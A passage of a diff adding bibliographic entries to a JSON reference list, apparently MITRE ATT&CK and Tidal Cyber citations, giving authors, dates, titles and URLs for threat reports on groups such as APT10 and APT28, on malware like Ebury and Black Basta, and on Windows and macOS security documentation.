"title": "An In-depth Analysis of Linux/Ebury" + }, + "related": [], + "uuid": "eb6d4f77-ac63-4cb8-8487-20f9e709334b", + "value": "ESET Ebury Feb 2014" + }, + { + "description": "M.Léveillé, M. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved January 8, 2018.", + "meta": { + "date_accessed": "2018-01-08T00:00:00Z", + "date_published": "2014-02-21T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" + ], + "source": "MITRE", + "title": "An In-depth Analysis of Linux/Ebury" + }, + "related": [], + "uuid": "39384c7a-3032-4b45-a5eb-8ebe7de22aa2", + "value": "Welivesecurity Ebury SSH" + }, + { + "description": "Avertium. (2022, June 1). AN IN-DEPTH LOOK AT BLACK BASTA RANSOMWARE. Retrieved March 7, 2023.", + "meta": { + "date_accessed": "2023-03-07T00:00:00Z", + "date_published": "2022-06-01T00:00:00Z", + "refs": [ + "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware" + ], + "source": "MITRE", + "title": "AN IN-DEPTH LOOK AT BLACK BASTA RANSOMWARE" + }, + "related": [], + "uuid": "31c2ef62-2852-5418-9d52-2479a3a619d0", + "value": "Avertium Black Basta June 2022" + }, + { + "description": "Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014.", + "meta": { + "date_accessed": "2014-11-13T00:00:00Z", + "date_published": "2007-01-01T00:00:00Z", + "refs": [ + "http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf" + ], + "source": "MITRE", + "title": "An Introduction to Hardware-Assisted Virtual Machine (HVM) Rootkits" + }, + "related": [], + "uuid": "689dfe75-9c06-4438-86fa-5fbbb09f0fe7", + "value": "Myers 2007" + }, + { + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2006-01-11T00:00:00Z", + "refs": [ + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + "source": "MITRE", + "title": "An introduction to services, runlevels, and rc.d scripts" + }, + "related": [], + "uuid": "091aa85d-7d30-4800-9b2d-97f96d257798", + "value": "Linux Services Run Levels" + }, + { + "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.", + "meta": { + "date_accessed": "2020-05-19T00:00:00Z", + "date_published": "2020-04-30T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z" + ], + "source": "MITRE", + "title": "Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center" + }, + "related": [], + "uuid": "f1d28b91-a529-439d-9548-c597baa245d4", + "value": "Anomali Pirate Panda April 2020" + }, + { + "description": "ADL. (2015, July 6). AnonGhost Team. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2015-07-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.adl.org/resources/profile/anonghost-team" + ], + "source": "Tidal Cyber", + "title": "AnonGhost Team" + }, + "related": [], + "uuid": "f868f5fa-df66-435f-8b32-d58e4785e46c", + "value": "AnonGhost Team Profile" + }, + { + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "meta": { + "date_accessed": "2017-03-09T00:00:00Z", + "date_published": "2011-02-15T00:00:00Z", + "refs": [ + "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + ], + "source": "MITRE", + "title": "Anonymous speaks: the inside story of the HBGary hack" + }, + "related": [], + "uuid": "19ab02ea-883f-441c-bebf-4be64855374a", + "value": "AnonHBGary" + }, + { + "description": "Zhang, X. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.", + "meta": { + "date_accessed": "2020-07-30T00:00:00Z", + "date_published": "2020-02-04T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions" + ], + "source": "MITRE", + "title": "Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries" + }, + "related": [], + "uuid": "e89e3825-85df-45cf-b309-e449afed0288", + "value": "Fortinet Metamorfo Feb 2020" + }, + { + "description": "Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "date_published": "2018-06-14T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/" + ], + "source": "MITRE", + "title": "Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor" + }, + "related": [], + "uuid": "b2c415e4-edbe-47fe-9820-b968114f81f0", + "value": "MuddyWater TrendMicro June 2018" + }, + { + "description": "Blasco, J. (2011, December 12). Another Sykipot sample likely targeting US federal agencies. Retrieved March 28, 2016.", + "meta": { + "date_accessed": "2016-03-28T00:00:00Z", + "date_published": "2011-12-12T00:00:00Z", + "refs": [ + "https://www.alienvault.com/open-threat-exchange/blog/another-sykipot-sample-likely-targeting-us-federal-agencies" + ], + "source": "MITRE", + "title": "Another Sykipot sample likely targeting US federal agencies" + }, + "related": [], + "uuid": "800363c1-60df-47e7-8ded-c0f4b6e758f4", + "value": "AlienVault Sykipot 2011" + }, + { + "description": "Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.", + "meta": { + "date_accessed": "2020-09-09T00:00:00Z", + "date_published": "2018-09-19T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/" + ], + "source": "MITRE", + "title": "Another Victim of the Magecart Assault Emerges: Newegg" + }, + "related": [], + "uuid": "095a705f-810b-4c4f-90ce-016117a5b4b6", + "value": "RiskIQ Newegg September 2018" + }, + { + "description": "Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.", + "meta": { + "date_accessed": "2016-03-30T00:00:00Z", + "date_published": "2016-03-28T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/wmi-persistence" + ], + "source": "MITRE", + "title": "A Novel WMI Persistence Implementation" + }, + "related": [], + "uuid": "a88dd548-ac8f-4297-9e23-de2643294846", + "value": "Dell WMI Persistence" + }, + { + "description": "Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2003-02-01T00:00:00Z", + "refs": [ + "http://www.megasecurity.org/papers/Rootkits.pdf" + ], + "source": "MITRE", + "title": "An Overview of Rootkits" + }, + "related": [], + "uuid": "c1aef861-9e31-42e6-a2eb-5151b056762b", + "value": "iDefense Rootkit Overview" + }, + { + "description": "Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.", + "meta": { + "date_accessed": "2022-01-24T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" + ], + "source": "MITRE", + "title": "Anticipating Cyber Threats as the Ukraine Crisis Escalates" + }, + "related": [], + "uuid": "6f53117f-2e94-4981-be61-c3da4b783ce2", + "value": "Mandiant Ukraine Cyber Threats January 2022" + }, + { + "description": "Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2019-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + "source": "MITRE", + "title": "Antimalware Scan Interface (AMSI)" + }, + "related": [], + "uuid": "32a4b7b5-8560-4600-aba9-15a6342b4dc3", + "value": "Microsoft AMSI" + }, + { + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2020-10-13T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + ], + "source": "MITRE", + "title": "Anti-spoofing protection in EOP" + }, + "related": [], + "uuid": "b3ac28ac-3f98-40fd-b1da-2461a9e3ffca", + "value": "Microsoft Anti Spoofing" + }, + { + "description": "Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.", + "meta": { + "date_accessed": "2017-01-20T00:00:00Z", + "date_published": "2015-02-16T00:00:00Z", + "refs": [ + "https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/" + ], + "source": "MITRE", + "title": "Anunak (aka Carbanak) Update" + }, + "related": [], + "uuid": "d74a8d0b-887a-40b9-bd43-366764157990", + "value": "Fox-It Anunak Feb 2015" + }, + { + "description": "Group-IB and Fox-IT. (2014, December). Anunak: APT against financial institutions. Retrieved April 20, 2016.", + "meta": { + "date_accessed": "2016-04-20T00:00:00Z", + "date_published": "2014-12-01T00:00:00Z", + "refs": [ + "http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf" + ], + "source": "MITRE", + "title": "Anunak: APT against financial institutions" + }, + "related": [], + "uuid": "fd254ecc-a076-4b9f-97f2-acb73c6a1695", + "value": "Group-IB Anunak" + }, + { + "description": "Huntley, S. (2022, March 7). An update on the threat landscape. Retrieved March 16, 2022.", + "meta": { + "date_accessed": "2022-03-16T00:00:00Z", + "date_published": "2022-03-07T00:00:00Z", + "refs": [ + "https://blog.google/threat-analysis-group/update-threat-landscape-ukraine" + ], + "source": "MITRE", + "title": "An update on the threat landscape" + }, + "related": [], + "uuid": "a6070f95-fbee-472e-a737-a8adbedbb4f8", + "value": "Google TAG Ukraine Threat Landscape March 2022" + }, + { + "description": "Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2006-12-06T00:00:00Z", + "refs": [ + "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/" + ], + "source": "MITRE", + "title": "Any application-defined hook procedure on my machine?" + }, + "related": [], + "uuid": "e816127a-04e4-4145-a784-50b1215612f2", + "value": "Zairon Hooking Dec 2006" + }, + { + "description": "Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "date_published": "2022-06-09T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/" + ], + "source": "MITRE", + "title": "Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years" + }, + "related": [], + "uuid": "b4e792e0-b1fa-4639-98b1-233aaec53594", + "value": "SentinelOne Aoqin Dragon June 2022" + }, + { + "description": "Apache. (n.d.). Apache HTTP Server Version 2.4 Documentation - Web Site Content. Retrieved July 27, 2018.", + "meta": { + "date_accessed": "2018-07-27T00:00:00Z", + "refs": [ + "http://httpd.apache.org/docs/2.4/getting-started.html#content" + ], + "source": "MITRE", + "title": "Apache HTTP Server Version 2.4 Documentation - Web Site Content" + }, + "related": [], + "uuid": "46f62435-bfb3-44b6-8c79-54af584cc35f", + "value": "Apache Server 2018" + }, + { + "description": "Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.", + "meta": { + "date_accessed": "2019-09-24T00:00:00Z", + "date_published": "2019-02-27T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox" + ], + "source": "MITRE", + "title": "A Peek into BRONZE UNION’s Toolbox" + }, + "related": [], + "uuid": "691df278-fd7d-4b73-a22c-227bc7641dec", + "value": "Secureworks BRONZEUNION Feb 2019" + }, + { + "description": "AppArmor. (2017, October 19). AppArmor Security Project Wiki. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-10-19T00:00:00Z", + "refs": [ + "http://wiki.apparmor.net/index.php/Main_Page" + ], + "source": "MITRE", + "title": "AppArmor Security Project Wiki" + }, + "related": [], + "uuid": "12df02e3-bbdd-4682-9662-1810402ad918", + "value": "AppArmor official" + }, + { + "description": "Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.", + "meta": { + "date_accessed": "2016-07-18T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" + ], + "source": "MITRE", + "title": "Appendix C (Digital) - The Malware Arsenal" + }, + "related": [], + "uuid": "1f31c09c-6a93-4142-8333-154138c1d70a", + "value": "Mandiant APT1 Appendix" + }, + { + "description": "Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.", + "meta": { + "date_accessed": "2015-07-15T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/dn280412" + ], + "source": "MITRE", + "title": "AppInit DLLs and Secure Boot" + }, + "related": [], + "uuid": "2b951be3-5105-4665-972f-7809c057fd3f", + "value": "AppInit Secure Boot" + }, + { + "description": "LOLBAS. (2020, December 2). AppInstaller.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-12-02T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/" + ], + "source": "Tidal Cyber", + "title": "AppInstaller.exe" + }, + "related": [], + "uuid": "9a777e7c-e76c-465c-8b45-67503e715f7e", + "value": "AppInstaller.exe - LOLBAS Project" + }, + { + "description": "Patrick Wardle. (2020, August 30). Apple Approved Malware malicious code ...now notarized!? #2020. Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2020-08-30T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x4E.html" + ], + "source": "MITRE", + "title": "Apple Approved Malware malicious code ...now notarized!? #2020" + }, + "related": [], + "uuid": "a2127d3d-c320-4637-a85c-16e20c2654f6", + "value": "objectivesee osx.shlayer apple approved 2020" + }, + { + "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.", + "meta": { + "date_accessed": "2019-08-08T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg" + ], + "source": "MITRE", + "title": "Apple Developer Documentation - AuthorizationExecuteWithPrivileges" + }, + "related": [], + "uuid": "7b8875e8-5b93-4d49-a12b-2683bab2ba6e", + "value": "AppleDocs AuthorizationExecuteWithPrivileges" + }, + { + "description": "Apple. (n.d.). Retrieved July 17, 2017.", + "meta": { + "date_accessed": "2017-07-17T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html" + ], + "source": "MITRE", + "title": "AppleDocs Scheduling Timed Jobs" + }, + "related": [], + "uuid": "66dd8a7d-521f-4610-b478-52d748185ad3", + "value": "AppleDocs Scheduling Timed Jobs" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.", + "meta": { + "date_accessed": "2021-03-01T00:00:00Z", + "date_published": "2021-02-21T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a" + ], + "source": "MITRE", + "title": "AppleJeus: Analysis of North Korea’s Cryptocurrency Malware" + }, + "related": [], + "uuid": "6873e14d-eba4-4e3c-9ccf-cec1d760f0be", + "value": "CISA AppleJeus Feb 2021" + }, + { + "description": "Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "refs": [ + "https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf" + ], + "source": "MITRE", + "title": "Apple Remote Desktop Administrator Guide Version 3.3" + }, + "related": [], + "uuid": "c57c2bba-a398-4e68-b2a7-fddcf0740b61", + "value": "Apple Remote Desktop Admin Guide 3.3" + }, + { + "description": "Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018.", + "meta": { + "date_accessed": "2018-09-21T00:00:00Z", + "date_published": "2013-12-23T00:00:00Z", + "refs": [ + "https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/" + ], + "source": "MITRE", + "title": "AppleScript and Automator gain new features in OS X Mavericks" + }, + "related": [], + "uuid": "dd76c7ab-c3df-4f34-aaf0-684b56499065", + "value": "applescript signing" + }, + { + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "meta": { + "date_accessed": "2014-11-18T00:00:00Z", + "date_published": "2008-06-01T00:00:00Z", + "refs": [ + "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + ], + "source": "MITRE", + "title": "Application Lockdown with Software Restriction Policies" + }, + "related": [], + "uuid": "cae409ca-1c77-45df-88cd-c0998ac724ec", + "value": "Corio 2008" + }, + { + "description": "Corio, C., & Sayana, D. P.. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "meta": { + "date_accessed": "2014-11-18T00:00:00Z", + "date_published": "2008-06-01T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc510322(v=msdn.10)?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Application Lockdown with Software Restriction Policies" + }, + "related": [], + "uuid": "5dab4466-0871-486a-84ad-0e648b2e937d", + "value": "Microsoft Application Lockdown" + }, + { + "description": "Beechey, J.. (2014, November 18). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "meta": { + "date_accessed": "2014-11-18T00:00:00Z", + "date_published": "2014-11-18T00:00:00Z", + "refs": [ + "https://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + ], + "source": "MITRE", + "title": "Application Whitelisting: Panacea or Propaganda?" + }, + "related": [], + "uuid": "a333f45f-1760-443a-9208-f3682ea32f67", + "value": "SANS Application Whitelisting" + }, + { + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "meta": { + "date_accessed": "2014-11-18T00:00:00Z", + "date_published": "2010-12-01T00:00:00Z", + "refs": [ + "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + ], + "source": "MITRE", + "title": "Application Whitelisting: Panacea or Propaganda?" + }, + "related": [], + "uuid": "4994e065-c6e4-4b41-8ae3-d72023135429", + "value": "Beechey 2010" + }, + { + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "meta": { + "date_accessed": "2016-03-31T00:00:00Z", + "date_published": "2014-08-01T00:00:00Z", + "refs": [ + "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm" + ], + "source": "MITRE", + "title": "Application Whitelisting Using Microsoft AppLocker" + }, + "related": [], + "uuid": "0db5c3ea-5392-4fd3-9f1d-9fa69aba4259", + "value": "NSA MS AppLocker" + }, + { + "description": "netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "date_published": "2017-07-06T00:00:00Z", + "refs": [ + "https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/" + ], + "source": "MITRE", + "title": "AppLocker Bypass – MSXSL" + }, + "related": [], + "uuid": "2f1adf20-a4b8-48c1-861f-0a44271765d7", + "value": "Penetration Testing Lab MSXSL July 2017" + }, + { + "description": "Microsoft. (2023, January 30). Approve or deny requests for Azure AD roles in Privileged Identity Management. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2023-01-30T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/azure-ad-pim-approval-workflow" + ], + "source": "MITRE", + "title": "Approve or deny requests for Azure AD roles in Privileged Identity Management" + }, + "related": [], + "uuid": "1495effe-16a6-5b4e-9b50-1d1f7db48fa7", + "value": "Microsoft Requests for Azure AD Roles in Privileged Identity Management" + }, + { + "description": "Apple Inc. (2021, February 18). App security overview. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2021-02-18T00:00:00Z", + "refs": [ + "https://support.apple.com/guide/security/app-security-overview-sec35dd877d0/1/web/1" + ], + "source": "MITRE", + "title": "App security overview" + }, + "related": [], + "uuid": "3b1e9a5d-7940-43b5-bc11-3112c0762740", + "value": "Apple App Security Overview" + }, + { + "description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "date_published": "2016-10-27T00:00:00Z", + "refs": [ + "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/" + ], + "source": "MITRE", + "title": "AppUNBlocker: Bypassing AppLocker" + }, + "related": [], + "uuid": "2afb9a5f-c023-49df-90d1-e0ffb6d192f3", + "value": "Tripwire AppUNBlocker" + }, + { + "description": "LOLBAS. (2018, May 25). Appvlp.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/" + ], + "source": "Tidal Cyber", + "title": "Appvlp.exe" + }, + "related": [], + "uuid": "b0afe3e8-9f1d-4295-8811-8dfbe993c337", + "value": "Appvlp.exe - LOLBAS Project" + }, + { + "description": "Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2017-12-07T00:00:00Z", + "refs": [ + "https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf" + ], + "source": "MITRE", + "title": "A Process is No One: Hunting for Token Manipulation" + }, + "related": [], + "uuid": "2eaee06d-529d-4fe0-9ca3-c62419f47a90", + "value": "BlackHat Atkinson Winchester Token Manipulation" + }, + { + "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", + "meta": { + "date_accessed": "2017-06-29T00:00:00Z", + "date_published": "2017-04-06T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + ], + "source": "MITRE", + "title": "APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat" + }, + "related": [], + "uuid": "2d494df8-83e3-45d2-b798-4c3bcf55f675", + "value": "FireEye APT10 April 2017" + }, + { + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "meta": { + "date_accessed": "2021-06-17T00:00:00Z", + "date_published": "2021-03-30T00:00:00Z", + "refs": [ + "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + ], + "source": "MITRE", + "title": "APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign" + }, + "related": [], + "uuid": "90450a1e-59c3-491f-b842-2cf81023fc9e", + "value": "Securelist APT10 March 2021" + }, + { + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "meta": { + "date_accessed": "2018-09-17T00:00:00Z", + "date_published": "2018-09-13T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + ], + "source": "MITRE", + "title": "APT10 Targeting Japanese Corporations Using Updated TTPs" + }, + "related": [], + "uuid": "5f122a27-2137-4016-a482-d04106187594", + "value": "FireEye APT10 Sept 2018" + }, + { + "description": "Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.", + "meta": { + "date_accessed": "2018-04-04T00:00:00Z", + "date_published": "2018-03-10T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + ], + "source": "MITRE", + "title": "APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS" + }, + "related": [], + "uuid": "02a50445-de06-40ab-9ea4-da5c37e066cd", + "value": "NCC Group APT15 Alive and Strong" + }, + { + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "meta": { + "date_accessed": "2016-07-18T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT1 Exposing One of China’s Cyber Espionage Units" + }, + "related": [], + "uuid": "865eba93-cf6a-4e41-bc09-de9b0b3c2669", + "value": "Mandiant APT1" + }, + { + "description": "Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.", + "meta": { + "date_accessed": "2021-11-12T00:00:00Z", + "date_published": "2020-12-01T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20210104144857/https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf" + ], + "source": "MITRE", + "title": "APT27 Turns to Ransomware" + }, + "related": [], + "uuid": "0290ea31-f817-471e-85ae-c3855c63f5c3", + "value": "Profero APT27 December 2020" + }, + { + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "meta": { + "date_accessed": "2017-01-11T00:00:00Z", + "date_published": "2017-01-11T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT28: At the Center of the Storm" + }, + "related": [], + "uuid": "61d80b8f-5bdb-41e6-b59a-d2d996392873", + "value": "FireEye APT28 January 2017" + }, + { + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "meta": { + "date_accessed": "2015-08-19T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?" + }, + "related": [], + "uuid": "c423b2b2-25a3-4a8d-b89a-83ab07c0cd20", + "value": "FireEye APT28" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, April 18). APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers. Retrieved August 23, 2023.", + "meta": { + "date_accessed": "2023-08-23T00:00:00Z", + "date_published": "2023-04-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108" + ], + "source": "Tidal Cyber", + "title": "APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers" + }, + "related": [], + "uuid": "c532a6fc-b27f-4240-a071-3eaa866bce89", + "value": "U.S. CISA APT28 Cisco Routers April 18 2023" + }, + { + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "meta": { + "date_accessed": "2018-11-14T00:00:00Z", + "date_published": "2018-10-04T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + ], + "source": "MITRE", + "title": "APT28: New Espionage Operations Target Military and Government Organizations" + }, + "related": [], + "uuid": "777bc94a-6c21-4f8c-9efa-a1cf52ececc0", + "value": "Symantec APT28 Oct 2018" + }, + { + "description": "Smith, L. and Read, B.. (2017, August 11). APT28 Targets Hospitality Sector, Presents Threat to Travelers. Retrieved August 17, 2017.", + "meta": { + "date_accessed": "2017-08-17T00:00:00Z", + "date_published": "2017-08-11T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html" + ], + "source": "MITRE", + "title": "APT28 Targets Hospitality Sector, Presents Threat to Travelers" + }, + "related": [], + "uuid": "7887dc90-3f05-411a-81ea-b86aa392104b", + "value": "FireEye APT28 Hospitality Aug 2017" + }, + { + "description": "Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.", + "meta": { + "date_accessed": "2017-02-23T00:00:00Z", + "date_published": "2015-12-01T00:00:00Z", + "refs": [ + 